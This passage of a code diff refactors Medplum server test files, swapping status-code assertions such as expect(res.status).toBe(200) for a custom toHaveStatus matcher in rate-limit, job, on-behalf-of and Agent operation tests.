     const redis = getRateLimitRedis();
@@ -311,11 +311,11 @@ describe('FHIR Rate Limits', () => {
 
     // Make a request that consumes the entire quota
     const res = await request(app).get('/fhir/R4/Patient?_count=20').auth(accessToken, { type: 'bearer' }).send();
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     // Make another request that gets rate limited
     const res2 = await request(app).get('/fhir/R4/Patient').auth(accessToken, { type: 'bearer' }).send();
-    expect(res2.status).toBe(429);
+    expect(res2).toHaveStatus(429);
 
     // The membership should still appear in the active set
     const redis = getRateLimitRedis();

--- a/packages/server/src/fhir/job.test.ts
+++ b/packages/server/src/fhir/job.test.ts
@@ -46,7 +46,7 @@ describe('Job status', () => {
         .get(`/fhir/R4/job/${job.id}/status`)
         .set('Authorization', 'Bearer ' + accessToken);
 
-      expect(res.status).toBe(202);
+      expect(res).toHaveStatus(202);
       expect(res.get('Content-Type')).toStrictEqual('application/fhir+json; charset=utf-8');
       expect(res.body).toStrictEqual(expect.objectContaining({ id: job.id, request: job.request, status: 'accepted' }));
     }));
@@ -68,7 +68,7 @@ describe('Job status', () => {
         .get(`/fhir/R4/job/${job.id}/status`)
         .set('Authorization', 'Bearer ' + accessToken);
 
-      expect(res.status).toBe(200);
+      expect(res).toHaveStatus(200);
       expect(res.get('Content-Type')).toStrictEqual('application/fhir+json; charset=utf-8');
       expect(res.body).toStrictEqual(
         expect.objectContaining({ id: job.id, request: job.request, status: 'completed' })
@@ -82,14 +82,14 @@ describe('Job status', () => {
       const res1 = await request(app)
         .get(`/fhir/R4/job/${job.id}/status`)
         .set('Authorization', 'Bearer ' + accessToken);
-      expect(res1.status).toStrictEqual(202);
+      expect(res1).toHaveStatus(202);
       expect(res1.body?.status).toStrictEqual('accepted');
 
       // Cancel the job
       const res2 = await request(app)
         .delete(`/fhir/R4/job/${job.id}/status`)
         .set('Authorization', 'Bearer ' + accessToken);
-      expect(res2.status).toStrictEqual(202);
+      expect(res2).toHaveStatus(202);
       expect(res2.body).toMatchObject({
         resourceType: 'OperationOutcome',
         id: 'accepted',
@@ -110,7 +110,7 @@ describe('Job status', () => {
         .set('Authorization', 'Bearer ' + accessToken)
         .set('Content-Type', ContentType.FHIR_JSON);
 
-      expect(res3.status).toStrictEqual(200);
+      expect(res3).toHaveStatus(200);
       expect(res3.body).toMatchObject<AsyncJob>({
         id: job.id,
         resourceType: 'AsyncJob',
@@ -125,7 +125,7 @@ describe('Job status', () => {
         .get(`/fhir/R4/job/${job.id}/status`)
         .set('Authorization', 'Bearer ' + accessToken);
 
-      expect(res4.status).toBe(200);
+      expect(res4).toHaveStatus(200);
       expect(res4.body).toStrictEqual(
         expect.objectContaining({ id: job.id, request: job.request, status: 'cancelled' })
       );
@@ -148,7 +148,7 @@ describe('Job status', () => {
         .get(`/fhir/R4/job/${job.id}/status`)
         .set('Authorization', 'Bearer ' + accessToken);
 
-      expect(res.status).toBe(200);
+      expect(res).toHaveStatus(200);
       expect(res.get('Content-Type')).toStrictEqual('application/fhir+json; charset=utf-8');
       expect(res.body).toStrictEqual(
         expect.objectContaining({ id: job.id, request: job.request, status: 'completed' })
@@ -159,7 +159,7 @@ describe('Job status', () => {
         .delete(`/fhir/R4/job/${job.id}/status`)
         .set('Authorization', 'Bearer ' + accessToken);
 
-      expect(res2.status).toBe(400);
+      expect(res2).toHaveStatus(400);
       expect(res2.get('Content-Type')).toStrictEqual('application/fhir+json; charset=utf-8');
       expect(res2.body).toMatchObject({
         resourceType: 'OperationOutcome',

--- a/packages/server/src/fhir/onbehalfof.test.ts
+++ b/packages/server/src/fhir/onbehalfof.test.ts
@@ -66,7 +66,7 @@ describe('On Behalf Of', () => {
         .set('X-Medplum-On-Behalf-Of', getReferenceString(testAccount1.profile))
         .set('Content-Type', ContentType.FHIR_JSON)
         .send({ resourceType: 'Patient' });
-      expect(res1.status).toBe(201);
+      expect(res1).toHaveStatus(201);
       expect(res1.body.resourceType).toStrictEqual('Patient');
       expect(res1.headers.location).toContain('Patient');
       expect(res1.headers.location).toContain(res1.body.id);
@@ -82,7 +82,7 @@ describe('On Behalf Of', () => {
         .set('Authorization', basicAuth)
         .set('X-Medplum', 'extended')
         .set('X-Medplum-On-Behalf-Of', getReferenceString(testAccount1.profile));
-      expect(res2.status).toBe(200);
+      expect(res2).toHaveStatus(200);
 
       const patient2 = res2.body;
       expect(patient2.resourceType).toBe('Patient');
@@ -98,7 +98,7 @@ describe('On Behalf Of', () => {
         .set('X-Medplum-On-Behalf-Of', getReferenceString(testAccount2.profile))
         .set('Content-Type', ContentType.FHIR_JSON)
         .send({ resourceType: 'Patient' });
-      expect(res3.status).toBe(201);
+      expect(res3).toHaveStatus(201);
       expect(res3.body.resourceType).toStrictEqual('Patient');
       expect(res3.headers.location).toContain('Patient');
       expect(res3.headers.location).toContain(res3.body.id);
@@ -114,7 +114,7 @@ describe('On Behalf Of', () => {
         .set('Authorization', basicAuth)
         .set('X-Medplum', 'extended')
         .set('X-Medplum-On-Behalf-Of', getReferenceString(testAccount2.profile));
-      expect(res4.status).toBe(200);
+      expect(res4).toHaveStatus(200);
 
       const patient4 = res4.body;
       expect(patient4.resourceType).toBe('Patient');
@@ -129,7 +129,7 @@ describe('On Behalf Of', () => {
         .set('Authorization', basicAuth)
         .set('X-Medplum', 'extended')
         .set('X-Medplum-On-Behalf-Of', getReferenceString(testAccount2.profile));
-      expect(res5.status).toBe(404);
+      expect(res5).toHaveStatus(404);
 
       // Try to read the second patient on behalf of test account 1
       // This should fail because the patient was created on behalf of test account 2
@@ -138,7 +138,7 @@ describe('On Behalf Of', () => {
         .set('Authorization', basicAuth)
         .set('X-Medplum', 'extended')
         .set('X-Medplum-On-Behalf-Of', getReferenceString(testAccount1.profile));
-      expect(res6.status).toBe(404);
+      expect(res6).toHaveStatus(404);
     }));
 
   test('Set meta onBehalfOf with client credentials', () =>
@@ -182,7 +182,7 @@ describe('On Behalf Of', () => {
         .set('X-Medplum-On-Behalf-Of', getReferenceString(testAccount1.profile))
         .set('Content-Type', ContentType.FHIR_JSON)
         .send({ resourceType: 'Patient' });
-      expect(res1.status).toBe(201);
+      expect(res1).toHaveStatus(201);
       expect(res1.body.resourceType).toStrictEqual('Patient');
       expect(res1.headers.location).toContain('Patient');
       expect(res1.headers.location).toContain(res1.body.id);
@@ -198,7 +198,7 @@ describe('On Behalf Of', () => {
         .set('Authorization', 'Bearer ' + accessToken)
         .set('X-Medplum', 'extended')
         .set('X-Medplum-On-Behalf-Of', getReferenceString(testAccount1.profile));
-      expect(res2.status).toBe(200);
+      expect(res2).toHaveStatus(200);
 
       const patient2 = res2.body;
       expect(patient2.resourceType).toBe('Patient');
@@ -214,7 +214,7 @@ describe('On Behalf Of', () => {
         .set('X-Medplum-On-Behalf-Of', getReferenceString(testAccount2.profile))
         .set('Content-Type', ContentType.FHIR_JSON)
         .send({ resourceType: 'Patient' });
-      expect(res3.status).toBe(201);
+      expect(res3).toHaveStatus(201);
       expect(res3.body.resourceType).toStrictEqual('Patient');
       expect(res3.headers.location).toContain('Patient');
       expect(res3.headers.location).toContain(res3.body.id);
@@ -230,7 +230,7 @@ describe('On Behalf Of', () => {
         .set('Authorization', 'Bearer ' + accessToken)
         .set('X-Medplum', 'extended')
         .set('X-Medplum-On-Behalf-Of', getReferenceString(testAccount2.profile));
-      expect(res4.status).toBe(200);
+      expect(res4).toHaveStatus(200);
 
       const patient4 = res4.body;
       expect(patient4.resourceType).toBe('Patient');
@@ -245,7 +245,7 @@ describe('On Behalf Of', () => {
         .set('Authorization', 'Bearer ' + accessToken)
         .set('X-Medplum', 'extended')
         .set('X-Medplum-On-Behalf-Of', getReferenceString(testAccount2.profile));
-      expect(res5.status).toBe(404);
+      expect(res5).toHaveStatus(404);
 
       // Try to read the second patient on behalf of test account 1
       // This should fail because the patient was created on behalf of test account 2
@@ -254,7 +254,7 @@ describe('On Behalf Of', () => {
         .set('Authorization', 'Bearer ' + accessToken)
         .set('X-Medplum', 'extended')
         .set('X-Medplum-On-Behalf-Of', getReferenceString(testAccount1.profile));
-      expect(res6.status).toBe(404);
+      expect(res6).toHaveStatus(404);
     }));
 
   test('Forbidden for non-admin', () =>
@@ -278,7 +278,7 @@ describe('On Behalf Of', () => {
         .set('X-Medplum-On-Behalf-Of', getReferenceString(testAccount2.profile))
         .set('Content-Type', ContentType.FHIR_JSON)
         .send({ resourceType: 'Patient' });
-      expect(res1.status).toBe(400);
+      expect(res1).toHaveStatus(400);
       expect(res1.body).toMatchObject<OperationOutcome>({
         resourceType: 'OperationOutcome',
         issue: [
@@ -318,7 +318,7 @@ describe('On Behalf Of', () => {
         .set('X-Medplum-On-Behalf-Of', getReferenceString(adminAccount2.client))
         .set('Content-Type', ContentType.FHIR_JSON)
         .send({ resourceType: 'Patient' });
-      expect(res1.status).toBe(400);
+      expect(res1).toHaveStatus(400);
       expect(res1.body).toMatchObject<OperationOutcome>({
         resourceType: 'OperationOutcome',
         issue: [
@@ -366,7 +366,7 @@ describe('On Behalf Of', () => {
         .set('X-Medplum-On-Behalf-Of', getReferenceString(testAccount.profile))
         .set('Content-Type', ContentType.FHIR_JSON)
         .send({ resourceType: 'Patient' });
-      expect(res1.status).toBe(201);
+      expect(res1).toHaveStatus(201);
       expect(res1.body.resourceType).toStrictEqual('Patient');
 
       const patient1 = res1.body as Patient;
@@ -389,7 +389,7 @@ describe('On Behalf Of', () => {
           resourceType: 'Patient',
           meta: {},
         });
-      expect(res2.status).toBe(201);
+      expect(res2).toHaveStatus(201);
       expect(res2.body.resourceType).toStrictEqual('Patient');
 
       const patient2 = res2.body as Patient;
@@ -415,7 +415,7 @@ describe('On Behalf Of', () => {
             account: { reference: 'Organization/' + randomUUID() },
           },
         });
-      expect(res3.status).toBe(201);
+      expect(res3).toHaveStatus(201);
       expect(res3.body.resourceType).toStrictEqual('Patient');
 
       const patient3 = res3.body as Patient;

--- a/packages/server/src/fhir/operations/agentbulkstatus.test.ts
+++ b/packages/server/src/fhir/operations/agentbulkstatus.test.ts
@@ -53,7 +53,7 @@ describe('Agent/$bulk-status', () => {
 
     const responses = await Promise.all(promises);
     for (let i = 0; i < NUM_DEFAULT_AGENTS; i++) {
-      expect(responses[i].status).toBe(201);
+      expect(responses[i]).toHaveStatus(201);
       agents[i] = responses[i].body;
     }
 
@@ -67,7 +67,7 @@ describe('Agent/$bulk-status', () => {
         name: 'Medplum Agent',
         status: 'active',
       } satisfies Agent);
-    expect(agent1Res.status).toStrictEqual(201);
+    expect(agent1Res).toHaveStatus(201);
 
     const agent2Res = await request(app)
       .post('/fhir/R4/Agent')
@@ -79,7 +79,7 @@ describe('Agent/$bulk-status', () => {
         name: 'Old Medplum Agent',
         status: 'off',
       } satisfies Agent);
-    expect(agent2Res.status).toStrictEqual(201);
+    expect(agent2Res).toHaveStatus(201);
 
     connectedAgent = agent1Res.body;
     disabledAgent = agent2Res.body;
@@ -117,7 +117,7 @@ describe('Agent/$bulk-status', () => {
     const res = await request(app)
       .get('/fhir/R4/Agent/$bulk-status')
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const bundle = res.body as Bundle<Parameters>;
     expect(bundle.resourceType).toBe('Bundle');
@@ -154,7 +154,7 @@ describe('Agent/$bulk-status', () => {
       .get('/fhir/R4/Agent/$bulk-status')
       .query({ 'name:contains': 'Medplum' })
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const bundle = res.body as Bundle<Parameters>;
     expect(bundle.resourceType).toBe('Bundle');
@@ -186,7 +186,7 @@ describe('Agent/$bulk-status', () => {
       .get('/fhir/R4/Agent/$bulk-status')
       .query({ 'name:contains': 'Medplum', status: 'active' })
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const bundle = res.body as Bundle<Parameters>;
     expect(bundle.resourceType).toBe('Bundle');
@@ -212,7 +212,7 @@ describe('Agent/$bulk-status', () => {
       .get('/fhir/R4/Agent/$bulk-status')
       .query({ name: 'INVALID_AGENT', status: 'active' })
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
 
     expect(res.body).toMatchObject<OperationOutcome>({
       resourceType: 'OperationOutcome',
@@ -237,7 +237,7 @@ describe('Agent/$bulk-status', () => {
       .get('/fhir/R4/Agent/$bulk-status')
       .query({ name: 'Test Agent 2' })
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const bundle = res.body as Bundle<Parameters>;
     expect(bundle.resourceType).toBe('Bundle');
@@ -270,7 +270,7 @@ describe('Agent/$bulk-status', () => {
       .get('/fhir/R4/Agent/$bulk-status')
       .query({ 'name:contains': 'Medplum', _count: MAX_AGENTS_PER_PAGE + 1 })
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     expectBundleToContainStatusEntry(res.body, connectedAgent, {
       status: AgentConnectionState.CONNECTED,

--- a/packages/server/src/fhir/operations/agentfetchlogs.test.ts
+++ b/packages/server/src/fhir/operations/agentfetchlogs.test.ts
@@ -52,7 +52,7 @@ describe('Agent/$fetch-logs', () => {
 
     const responses = await Promise.all(promises);
     for (let i = 0; i < NUM_DEFAULT_AGENTS; i++) {
-      expect(responses[i].status).toBe(201);
+      expect(responses[i]).toHaveStatus(201);
       agents[i] = responses[i].body;
     }
 
@@ -95,7 +95,7 @@ describe('Agent/$fetch-logs', () => {
       .get('/fhir/R4/Agent/$fetch-logs')
       .set('Authorization', 'Bearer ' + accessToken);
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     const bundle = res.body as Bundle<Parameters>;
 
     for (const agent of agents) {
@@ -130,7 +130,7 @@ describe('Agent/$fetch-logs', () => {
       .get(`/fhir/R4/Agent/${agents[0].id}/$fetch-logs`)
       .set('Authorization', 'Bearer ' + accessToken);
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     const params = res.body as Parameters;
 
     expect(params).toMatchObject<Parameters>({
@@ -168,7 +168,7 @@ describe('Agent/$fetch-logs', () => {
       .query({ limit: 2, before: '2020-01-02T00:00:02.000Z' })
       .set('Authorization', 'Bearer ' + accessToken);
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     const params = res.body as Parameters;
 
     expect(params).toMatchObject<Parameters>({
@@ -196,7 +196,7 @@ describe('Agent/$fetch-logs', () => {
       .query({ limit: 'true' })
       .set('Authorization', 'Bearer ' + accessToken);
 
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     const outcome = res.body as OperationOutcome;
 
     expect(outcome).toMatchObject(badRequest("Invalid value 'true' provided for integer parameter 'limit'"));

--- a/packages/server/src/fhir/operations/agentpush.test.ts
+++ b/packages/server/src/fhir/operations/agentpush.test.ts
@@ -54,7 +54,7 @@ describe('Agent Push', () => {
         name: 'Test Agent',
         status: 'active',
       });
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
     agent = res1.body as WithId<Agent>;
 
     const res2 = await request(app)
@@ -66,7 +66,7 @@ describe('Agent Push', () => {
         modelNumber: randomUUID(),
         url: 'mllp://192.168.50.10:56001',
       });
-    expect(res2.status).toBe(201);
+    expect(res2).toHaveStatus(201);
     device = res2.body as WithId<Device>;
 
     configMockAgents(port);
@@ -87,7 +87,7 @@ describe('Agent Push', () => {
         body: 'input',
         destination: getReferenceString(device),
       });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body).toMatchObject(allOk);
   });
 
@@ -104,7 +104,7 @@ describe('Agent Push', () => {
         },
         destination: getReferenceString(device),
       });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.headers['content-type']).toBe('application/fhir+json; charset=utf-8');
   });
 
@@ -122,7 +122,7 @@ describe('Agent Push', () => {
         body: text,
         destination: getReferenceString(device),
       });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body).toMatchObject(allOk);
   });
 
@@ -136,7 +136,7 @@ describe('Agent Push', () => {
         body: 'input',
         destination: getReferenceString(device),
       });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body).toMatchObject(allOk);
   });
 
@@ -154,7 +154,7 @@ describe('Agent Push', () => {
         body: text,
         destination: 'Device?model=' + device.modelNumber,
       });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body).toMatchObject(allOk);
   });
 
@@ -168,7 +168,7 @@ describe('Agent Push', () => {
         body: 'input',
         destination: getReferenceString(device),
       });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toStrictEqual('Must specify agent ID or identifier');
   });
 
@@ -181,7 +181,7 @@ describe('Agent Push', () => {
         body: 'input',
         destination: getReferenceString(device),
       });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toStrictEqual('Missing contentType parameter');
   });
 
@@ -194,7 +194,7 @@ describe('Agent Push', () => {
         contentType: ContentType.TEXT,
         destination: getReferenceString(device),
       });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toStrictEqual('Missing body parameter');
   });
 
@@ -207,7 +207,7 @@ describe('Agent Push', () => {
         contentType: ContentType.TEXT,
         body: 'input',
       });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toStrictEqual('Missing destination parameter');
   });
 
@@ -221,7 +221,7 @@ describe('Agent Push', () => {
         body: 'input',
         destination: 'foo',
       });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toStrictEqual('Destination device not found');
   });
 
@@ -235,7 +235,7 @@ describe('Agent Push', () => {
         body: 'input',
         destination: 'Device/' + randomUUID(),
       });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toStrictEqual('Destination device not found');
   });
 
@@ -246,7 +246,7 @@ describe('Agent Push', () => {
       .set('Content-Type', ContentType.FHIR_JSON)
       .set('Authorization', 'Bearer ' + accessToken)
       .send({ resourceType: 'Device' });
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
 
     const device2 = res1.body as WithId<Device>;
 
@@ -259,7 +259,7 @@ describe('Agent Push', () => {
         body: 'input',
         destination: getReferenceString(device2),
       });
-    expect(res2.status).toBe(400);
+    expect(res2).toHaveStatus(400);
     expect(res2.body.issue[0].details.text).toStrictEqual('Destination device missing url');
   });
 
@@ -274,7 +274,7 @@ describe('Agent Push', () => {
         destination: getReferenceString(device),
         waitTimeout: 60 * 60 * 1000,
       });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toStrictEqual('Invalid wait timeout');
   });
 
@@ -337,7 +337,7 @@ round-trip min/avg/max/stddev = 10.316/10.316/10.316/nan ms`,
     );
 
     const res = await deferredResponse;
-    expect(res.status).toStrictEqual(200);
+    expect(res).toHaveStatus(200);
     expect(res.text).toStrictEqual(expect.stringMatching(/ping statistics/i));
 
     publishSpy.mockRestore();
@@ -402,7 +402,7 @@ round-trip min/avg/max/stddev = 0.081/0.081/0.081/nan ms`,
     );
 
     const res = await deferredResponse;
-    expect(res.status).toStrictEqual(200);
+    expect(res).toHaveStatus(200);
     expect(res.text).toStrictEqual(expect.stringMatching(/ping statistics/i));
 
     publishSpy.mockRestore();
@@ -461,7 +461,7 @@ round-trip min/avg/max/stddev = 0.081/0.081/0.081/nan ms`,
     );
 
     const res = await deferredResponse;
-    expect(res.status).toStrictEqual(400);
+    expect(res).toHaveStatus(400);
 
     const body = res.body as OperationOutcome;
     expect(body).toBeDefined();
@@ -532,7 +532,7 @@ round-trip min/avg/max/stddev = 0.081/0.081/0.081/nan ms`,
 
     const res = await deferredResponse;
 
-    expect(res.status).toStrictEqual(202);
+    expect(res).toHaveStatus(202);
     expect(res.headers['content-location']).toBeDefined();
     const asyncJob = await waitForAsyncJob(res.headers['content-location'], app, accessToken);
     expect(asyncJob).toMatchObject<Partial<AsyncJob>>({
@@ -569,7 +569,7 @@ round-trip min/avg/max/stddev = 0.081/0.081/0.081/nan ms`,
         name: 'Test Agent',
         status: 'off',
       } satisfies Agent);
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
 
     const agent = res1.body as WithId<Agent>;
 
@@ -594,7 +594,7 @@ round-trip min/avg/max/stddev = 0.081/0.081/0.081/nan ms`,
         waitForResponse: true,
       } satisfies AgentPushParameters);
 
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body).toMatchObject<Partial<OperationOutcome>>({
       resourceType: 'OperationOutcome',
       issue: expect.arrayContaining([
@@ -624,7 +624,7 @@ round-trip min/avg/max/stddev = 0.081/0.081/0.081/nan ms`,
         destination: getReferenceString(device),
         returnAck: 'application',
       } satisfies AgentPushParameters);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body).toMatchObject(allOk);
 
     // Verify the returnAck was included in the transmit request
@@ -650,7 +650,7 @@ round-trip min/avg/max/stddev = 0.081/0.081/0.081/nan ms`,
         destination: getReferenceString(device),
         returnAck: 'first',
       } satisfies AgentPushParameters);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body).toMatchObject(allOk);
 
     // Verify the returnAck was included in the transmit request
@@ -675,7 +675,7 @@ round-trip min/avg/max/stddev = 0.081/0.081/0.081/nan ms`,
         body: 'input',
         destination: getReferenceString(device),
       });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body).toMatchObject(allOk);
 
     // Verify the returnAck was NOT included in the transmit request
@@ -700,7 +700,7 @@ round-trip min/avg/max/stddev = 0.081/0.081/0.081/nan ms`,
         name: 'Test Agent',
         status: 'off',
       } satisfies Agent);
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
 
     const agent = res1.body as WithId<Agent>;
 
@@ -726,7 +726,7 @@ round-trip min/avg/max/stddev = 0.081/0.081/0.081/nan ms`,
         waitForResponse: true,
       } satisfies AgentPushParameters);
 
-    expect(res.status).toStrictEqual(200);
+    expect(res).toHaveStatus(200);
     expect(res.text).toStrictEqual(expect.stringMatching(/ping statistics/i));
 
     cleanup();

--- a/packages/server/src/fhir/operations/agentreloadconfig.test.ts
+++ b/packages/server/src/fhir/operations/agentreloadconfig.test.ts
@@ -63,7 +63,7 @@ describe('Agent/$reload-config', () => {
 
     const responses = await Promise.all(promises);
     for (let i = 0; i < NUM_DEFAULT_AGENTS; i++) {
-      expect(responses[i].status).toBe(201);
+      expect(responses[i]).toHaveStatus(201);
       agents[i] = responses[i].body;
     }
 
@@ -93,7 +93,7 @@ describe('Agent/$reload-config', () => {
       .get('/fhir/R4/Agent/$reload-config')
       .set('Authorization', 'Bearer ' + accessToken);
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     const bundle = res.body as Bundle<Parameters>;
 
     for (const agent of agents) {
@@ -117,7 +117,7 @@ describe('Agent/$reload-config', () => {
       .get(`/fhir/R4/Agent/${agents[0].id}/$reload-config`)
       .set('Authorization', 'Bearer ' + accessToken);
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     const outcome = res.body as OperationOutcome;
 
     expect(outcome).toMatchObject(allOk);
@@ -143,7 +143,7 @@ describe('Agent/$reload-config', () => {
       .get('/fhir/R4/Agent/$reload-config')
       .set('Authorization', 'Bearer ' + accessToken);
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     const bundle = res.body as Bundle<Parameters>;
 
     for (let i = 0; i < agents.length; i++) {
@@ -159,7 +159,7 @@ describe('Agent/$reload-config', () => {
       .get(`/fhir/R4/Agent/${agents[0].id}/$reload-config`)
       .set('Authorization', 'Bearer ' + accessToken);
 
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
 
     const outcome = res.body as OperationOutcome;
     expect(outcome).toMatchObject(badRequest('Something is broken'));
@@ -191,7 +191,7 @@ describe('Agent/$reload-config', () => {
       .get('/fhir/R4/Agent/$reload-config')
       .set('Authorization', 'Bearer ' + accessToken);
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     const bundle = res.body as Bundle<Parameters>;
 
     for (let i = 0; i < agents.length; i++) {
@@ -207,7 +207,7 @@ describe('Agent/$reload-config', () => {
       .get(`/fhir/R4/Agent/${agents[0].id}/$reload-config`)
       .set('Authorization', 'Bearer ' + accessToken);
 
-    expect(res.status).toBe(500);
+    expect(res).toHaveStatus(500);
 
     const outcome = res.body as OperationOutcome;
     expect(outcome).toMatchObject(serverError(new Error('Invalid response received from agent')));

--- a/packages/server/src/fhir/operations/agentstats.test.ts
+++ b/packages/server/src/fhir/operations/agentstats.test.ts
@@ -66,7 +66,7 @@ describe('Agent/$stats', () => {
 
     const responses = await Promise.all(promises);
     for (let i = 0; i < NUM_DEFAULT_AGENTS; i++) {
-      expect(responses[i].status).toBe(201);
+      expect(responses[i]).toHaveStatus(201);
       agents[i] = responses[i].body;
     }
 
@@ -95,7 +95,7 @@ describe('Agent/$stats', () => {
       .get('/fhir/R4/Agent/$stats')
       .set('Authorization', 'Bearer ' + accessToken);
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     const bundle = res.body as Bundle<Parameters>;
 
     for (const agent of agents) {
@@ -120,7 +120,7 @@ describe('Agent/$stats', () => {
       .get(`/fhir/R4/Agent/${agents[0].id}/$stats`)
       .set('Authorization', 'Bearer ' + accessToken);
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     const params = res.body as Parameters;
 
     expect(params).toMatchObject<Parameters>({

--- a/packages/server/src/fhir/operations/agentstatus.test.ts
+++ b/packages/server/src/fhir/operations/agentstatus.test.ts
@@ -32,7 +32,7 @@ describe('Agent Status', () => {
         name: 'Test Agent',
         status: 'active',
       });
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
     agent = res1.body as Agent;
   });
 
@@ -44,7 +44,7 @@ describe('Agent Status', () => {
     const res1 = await request(app)
       .get(`/fhir/R4/Agent/${agent.id}/$status`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res1.status).toBe(200);
+    expect(res1).toHaveStatus(200);
 
     const parameters1 = res1.body as Parameters;
     expect(parameters1.resourceType).toBe('Parameters');
@@ -67,7 +67,7 @@ describe('Agent Status', () => {
     const res2 = await request(app)
       .get(`/fhir/R4/Agent/${agent.id}/$status`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
 
     const parameters2 = res2.body as Parameters;
     expect(parameters2.resourceType).toBe('Parameters');
@@ -91,7 +91,7 @@ describe('Agent Status', () => {
     const res = await request(app)
       .get(`/fhir/R4/Agent/${agent.id}/$status`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
 
     expect(res.body).toMatchObject<OperationOutcome>({
       resourceType: 'OperationOutcome',
@@ -121,7 +121,7 @@ describe('Agent Status', () => {
       .get('/fhir/R4/Agent/$status')
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
 
     expect(res.body).toMatchObject<OperationOutcome>({
       resourceType: 'OperationOutcome',

--- a/packages/server/src/fhir/operations/agentupgrade.test.ts
+++ b/packages/server/src/fhir/operations/agentupgrade.test.ts
@@ -63,7 +63,7 @@ describe('Agent/$upgrade', () => {
 
     const responses = await Promise.all(promises);
     for (let i = 0; i < NUM_DEFAULT_AGENTS; i++) {
-      expect(responses[i].status).toBe(201);
+      expect(responses[i]).toHaveStatus(201);
       agents[i] = responses[i].body;
     }
 
@@ -91,7 +91,7 @@ describe('Agent/$upgrade', () => {
       .get('/fhir/R4/Agent/$upgrade')
       .set('Authorization', 'Bearer ' + accessToken);
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     const bundle = res.body as Bundle<Parameters>;
 
     for (const agent of agents) {
@@ -119,7 +119,7 @@ describe('Agent/$upgrade', () => {
       .get('/fhir/R4/Agent/$upgrade?timeout=1000')
       .set('Authorization', 'Bearer ' + accessToken);
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     const bundle = res.body as Bundle<Parameters>;
 
     for (const agent of agents) {
@@ -147,7 +147,7 @@ describe('Agent/$upgrade', () => {
       .get('/fhir/R4/Agent/$upgrade?timeout=100000')
       .set('Authorization', 'Bearer ' + accessToken);
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     const bundle = res.body as Bundle<Parameters>;
 
     for (const agent of agents) {
@@ -171,7 +171,7 @@ describe('Agent/$upgrade', () => {
       .get(`/fhir/R4/Agent/${agents[0].id}/$upgrade`)
       .set('Authorization', 'Bearer ' + accessToken);
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     const outcome = res.body as OperationOutcome;
 
     expect(outcome).toMatchObject(allOk);
@@ -194,7 +194,7 @@ describe('Agent/$upgrade', () => {
       .get('/fhir/R4/Agent/$upgrade?timeout=INVALID')
       .set('Authorization', 'Bearer ' + accessToken);
 
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body).toMatchObject<Partial<OperationOutcome>>({
       resourceType: 'OperationOutcome',
       issue: expect.arrayContaining<OperationOutcomeIssue>([
